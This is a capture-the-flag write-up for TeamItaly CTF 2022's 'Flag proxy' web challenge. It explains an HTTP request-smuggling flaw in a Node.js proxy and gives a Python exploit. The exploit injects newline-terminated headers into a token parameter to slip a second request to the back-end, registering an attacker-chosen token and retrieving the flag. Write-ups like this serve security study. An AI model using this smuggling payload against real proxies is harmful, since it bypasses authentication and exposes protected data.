Tags: web 

Rating:

TeamItaly CTF 2022

Flag proxy (41 solves)

I just added authentication to my flag service (server-back) thanks to a proxy (server-front), but a friend said it's useless...

Solution

The proxy's HTTP client can be exploited to make more than one request to the downstream server.
These are not valid HTTP requests, because some headers use only \n as line terminator, but the downstream server will accept them (it's not appening anymore since Node.JS 18.5.0).

Exploit

import requests
import random
import string

URL = os.environ.get("URL", "http://flag-proxy.challs.teamitaly.eu")

token = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(20))

payload = 'AAAA\n'
payload += 'Content-Length: 0\n'
payload += 'Connection: keep-alive\n'
payload += '\n'
payload += f'GET /add-token?token={token} HTTP/1.0\n'
payload += 'Host: localhost'

response = requests.get(f"{URL}/flag", params={'token': payload})

print(response.text)

response = requests.get(f"{URL}/flag", params={'token': token})

print(response.text)
Original writeup (https://github.com/TeamItaly/TeamItalyCTF-2022/blob/master/FlagProxy/README.md).